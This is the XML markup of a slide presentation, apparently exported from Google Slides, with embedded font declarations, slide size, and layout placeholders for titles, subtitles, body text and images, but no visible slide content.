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24377650" cy="13716000"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Helvetica Neue" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId35"/>
      <p:bold r:id="rId36"/>
      <p:italic r:id="rId37"/>
      <p:boldItalic r:id="rId38"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Lato Light" panose="020F0502020204030203" pitchFamily="34"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Black" panose="02000000000000000000" pitchFamily="2" charset="0"/>
      <p:bold r:id="rId47"/>
      <p:boldItalic r:id="rId48"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Light" panose="02000000000000000000" pitchFamily="2" charset="0"/>
      <p:regular r:id="rId49"/>
      <p:bold r:id="rId50"/>
      <p:italic r:id="rId51"/>
      <p:boldItalic r:id="rId52"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Medium" panose="02000000000000000000"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VDBG5PvjyAHB/1XNq456qw==" hashData="0oJeVB8zw3pQYnrumzhIHIDiiFbFP4IT9GVWr5ZTP7SKoJgOb2Eb4K8jpYW7vLMkmnxcwxLB99M7+jElGc4wG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651852-49E8-4B44-9917-7EA4C5F3A083}">
  <a:tblStyle styleId="{3F651852-49E8-4B44-9917-7EA4C5F3A0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6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4b37512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4b37512d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e4b37512d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bd883d690_0_34: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8bd883d690_0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bd883d690_0_4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bd883d690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e49bb938e4_0_39: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e49bb938e4_0_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49bb938e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49bb938e4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e49bb938e4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49bb938e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49bb938e4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e49bb938e4_0_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e44a2ef7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e44a2ef77b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e44a2ef77b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bd883d690_0_46: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bd883d690_0_5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bd883d690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bd883d690_0_5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bd883d690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2f60cf92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2f60cf925_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e2f60cf925_1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09e24a58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09e24a58b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e09e24a58b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44a2ef11b_3_0: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44a2ef11b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44094499c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44094499c_0_3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e44094499c_0_3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44a2ef11b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e44a2ef11b_3_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e44a2ef11b_3_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44094499c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e44094499c_0_3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e44094499c_0_35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e44094499c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e44094499c_0_3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ge44094499c_0_3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44a2ef11b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44a2ef11b_3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ge44a2ef11b_3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44a2ef11b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44a2ef11b_7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e44a2ef11b_7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44a2ef11b_4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e44a2ef11b_4_10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e44a2ef11b_4_10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e44a2ef11b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e44a2ef11b_9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ge44a2ef11b_9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2f3306097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2f3306097_0_7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e2f3306097_0_7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49bb938e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49bb938e4_0_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ge49bb938e4_0_9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2f3306097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e2f3306097_0_6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e2f3306097_0_67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e2f3306097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e2f3306097_0_6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e2f3306097_0_6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4e60f1acf_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4e60f1acf_5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e4e60f1acf_5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bd883d690_5_3101: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bd883d690_0_28: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bd883d690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bd883d690_5_5135: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8bd883d690_5_5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2f3306097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2f3306097_0_9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e2f3306097_0_9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bd883d690_0_12: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2f3306097_0_733:notes"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="382094"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2f3306097_0_7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831006" y="1985533"/>
            <a:ext cx="22715700" cy="54735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a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Google Shape;15;p2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="830984" y="7557667"/>
            <a:ext cx="22715700" cy="21135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a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Google Shape;16;p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830984" y="2949667"/>
            <a:ext cx="22715700" cy="52359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50" name="Google Shape;50;p11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="830984" y="8405933"/>
            <a:ext cx="22715700" cy="3468900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="243750" tIns="243750" rIns="243750" bIns="243750" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="457200" lvl="0" indent="-533400" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="4800"/>
              <a:buChar char="●"/>
              <a:defRPr/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="914400" lvl="1" indent="-463550" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buChar char="○"/>
              <a:defRPr/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1371600" lvl="2" indent="-463550" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buChar char="■"/>
              <a:defRPr/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1828800" lvl="3" indent="-463550" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buChar char="●"/>
              <a:defRPr/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2286000" lvl="4" indent="-463550" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buChar char="○"/>
              <a:defRPr/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2743200" lvl="5" indent="-463550" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buChar char="■"/>
              <a:defRPr/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="3200400" lvl="6" indent="-463550" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buChar char="●"/>
              <a:defRPr/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3657600" lvl="7" indent="-463550" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buChar char="○"/>
              <a:defRPr/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="4114800" lvl="8" indent="-463550" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buChar char="■"/>
              <a:defRPr/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="Google Shape;51;p11"/>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13"/>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57" name="Google Shape;57;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 name="Google Shape;58;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9" name="Google Shape;59;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 name="Google Shape;60;p13"/>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61" name="Google Shape;61;p13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467" y="3424667"/>
            <a:ext cx="24377700" cy="9659100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="1219000" tIns="0" rIns="1219000" bIns="2437975" anchor="t" anchorCtr="0">
            <a:norm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14"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="65" name="Google Shape;65;p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 name="Google Shape;66;p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 name="Google Shape;67;p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8" name="Google Shape;68;p1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69" name="Google Shape;69;p14"/>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 name="Google Shape;70;p14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1930897" y="5167539"/>
            <a:ext cx="6322500" cy="5911200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="487575" tIns="487575" rIns="487575" bIns="487575" anchor="t"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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="71" name="Google Shape;71;p14"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218833" y="3586941"/>
            <a:ext cx="1421954" cy="1422613"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="72" name="Google Shape;72;p1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73" name="Google Shape;73;p14"/>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74" name="Google Shape;74;p14"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8608308" y="3586941"/>
            <a:ext cx="1421954" cy="1422613"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="75" name="Google Shape;75;p1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76" name="Google Shape;76;p14"/>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77" name="Google Shape;77;p14"/>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subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9320372" y="5167565"/>
            <a:ext cx="6322500" cy="7100700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="487575" tIns="487575" rIns="487575" bIns="487575" anchor="t"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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="79" name="Google Shape;79;p14"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="16353290" y="3588941"/>
            <a:ext cx="1421954" cy="1422613"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="80" name="Google Shape;80;p1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81" name="Google Shape;81;p14"/>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82" name="Google Shape;82;p14"/>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 name="Google Shape;83;p14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17065355" y="5169565"/>
            <a:ext cx="6322500" cy="7100700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="487575" tIns="487575" rIns="487575" bIns="487575" anchor="t" anchorCtr="0">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85"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="86" name="Google Shape;86;p16"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2" cstate="print">
            <a:alphaModFix/>
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="119" b="119"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="18792305" y="2427400"/>
            <a:ext cx="4875530" cy="10092796"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="87" name="Google Shape;87;p16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1802600"/>
            <a:ext cx="17794500" cy="972900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="1219000" tIns="243750" rIns="1219000" bIns="0" anchor="t" anchorCtr="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88" name="Google Shape;88;p16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3322133"/>
            <a:ext cx="17860800" cy="10393500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="1219000" tIns="0" rIns="1219000" bIns="2437975" anchor="t" anchorCtr="0">
            <a:norm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89" name="Google Shape;89;p16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18811900" y="2427933"/>
            <a:ext cx="4836300" cy="10092900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="DBD9E8"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="487575" tIns="487575" rIns="487575" bIns="487575" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2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
        <p:nvSpPr>
          <p:cNvPr id="90" name="Google Shape;90;p16"/>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 name="Google Shape;91;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2" name="Google Shape;92;p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93" name="Google Shape;93;p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4" name="Google Shape;94;p16"/>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95"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="96" name="Google Shape;96;p17"/>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97" name="Google Shape;97;p17"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="437040" y="234686"/>
            <a:ext cx="23513873" cy="13256877"/>
            <a:chOff x="0" y="-1"/>
            <a:chExt cx="23520930" cy="13256877"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="98" name="Google Shape;98;p1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99" name="Google Shape;99;p1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00" name="Google Shape;100;p1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1" name="Google Shape;101;p1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2" name="Google Shape;102;p1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3" name="Google Shape;103;p1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4" name="Google Shape;104;p1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5" name="Google Shape;105;p1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06" name="Google Shape;106;p17"/>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rm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07" name="Google Shape;107;p17"/>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08" name="Google Shape;108;p17"/>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rm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320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32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32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32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32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32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32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3200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="320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09" name="Google Shape;109;p17"/>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0" name="Google Shape;110;p17" descr="Image"/>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21841267" y="443152"/>
            <a:ext cx="1014825" cy="10232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0984" y="5735600"/>
            <a:ext cx="22715700" cy="2244900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="243750" tIns="243750" rIns="243750" bIns="243750" anchor="ctr" anchorCtr="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9" name="Google Shape;19;p3"/>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2" name="Google Shape;22;p4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="830984" y="3073267"/>
            <a:ext cx="22715700" cy="9110400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="243750" tIns="243750" rIns="243750" bIns="243750" anchor="t"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23" name="Google Shape;23;p4"/>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26" name="Google Shape;26;p5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="83098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7" name="Google Shape;27;p5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12883044" y="3073267"/>
            <a:ext cx="10663500" cy="9110400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="243750" tIns="243750" rIns="243750" bIns="243750" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="457200" lvl="0" indent="-463550">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buChar char="●"/>
              <a:defRPr sz="37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28" name="Google Shape;28;p5"/>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830984" y="1186733"/>
            <a:ext cx="22715700" cy="1527300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="243750" tIns="243750" rIns="243750" bIns="243750" anchor="t" anchorCtr="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a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Google Shape;31;p6"/>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830984" y="1481600"/>
            <a:ext cx="7485900" cy="2015100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="243750" tIns="243750" rIns="243750" bIns="243750" anchor="b"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7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="830984" y="3705600"/>
            <a:ext cx="7485900" cy="8478300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="243750" tIns="243750" rIns="243750" bIns="243750" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="457200" lvl="0" indent="-431800">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3200"/>
              <a:buChar char="●"/>
              <a:defRPr sz="3200"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="914400" lvl="1" indent="-431800">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3200"/>
              <a:buChar char="○"/>
              <a:defRPr sz="3200"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1371600" lvl="2" indent="-431800">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3200"/>
              <a:buChar char="■"/>
              <a:defRPr sz="3200"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1828800" lvl="3" indent="-431800">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3200"/>
              <a:buChar char="●"/>
              <a:defRPr sz="3200"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2286000" lvl="4" indent="-431800">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3200"/>
              <a:buChar char="○"/>
              <a:defRPr sz="3200"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2743200" lvl="5" indent="-431800">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3200"/>
              <a:buChar char="■"/>
              <a:defRPr sz="3200"/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="3200400" lvl="6" indent="-431800">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3200"/>
              <a:buChar char="●"/>
              <a:defRPr sz="3200"/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3657600" lvl="7" indent="-431800">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3200"/>
              <a:buChar char="○"/>
              <a:defRPr sz="3200"/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="4114800" lvl="8" indent="-431800">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3200"/>
              <a:buChar char="■"/>
              <a:defRPr sz="3200"/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Google Shape;35;p7"/>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306993" y="1200400"/>
            <a:ext cx="16976400" cy="10908900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="243750" tIns="243750" rIns="243750" bIns="243750" anchor="ctr" anchorCtr="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endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Google Shape;38;p8"/>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12188825" y="-333"/>
            <a:ext cx="12188700" cy="13716000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt2"/>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707816" y="3288467"/>
            <a:ext cx="10784400" cy="3952800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="243750" tIns="243750" rIns="243750" bIns="243750" anchor="b" anchorCtr="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a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="Google Shape;42;p9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="707816" y="7474867"/>
            <a:ext cx="10784400" cy="3293700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="243750" tIns="243750" rIns="243750" bIns="2437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3" name="Google Shape;43;p9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13168570" y="1930867"/>
            <a:ext cx="10229400" cy="9853500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="243750" tIns="243750" rIns="243750" bIns="243750" anchor="ctr" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="457200" lvl="0" indent="-533400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="4800"/>
              <a:buChar char="●"/>
              <a:defRPr/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="914400" lvl="1" indent="-463550">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buChar char="○"/>
              <a:defRPr/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1371600" lvl="2" indent="-463550">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buChar char="■"/>
              <a:defRPr/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1828800" lvl="3" indent="-463550">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buChar char="●"/>
              <a:defRPr/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2286000" lvl="4" indent="-463550">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buChar char="○"/>
              <a:defRPr/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2743200" lvl="5" indent="-463550">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buChar char="■"/>
              <a:defRPr/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="3200400" lvl="6" indent="-463550">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buChar char="●"/>
              <a:defRPr/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3657600" lvl="7" indent="-463550">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buChar char="○"/>
              <a:defRPr/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="4114800" lvl="8" indent="-463550">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buChar char="■"/>
              <a:defRPr/>
            </a:lvl9pPr>
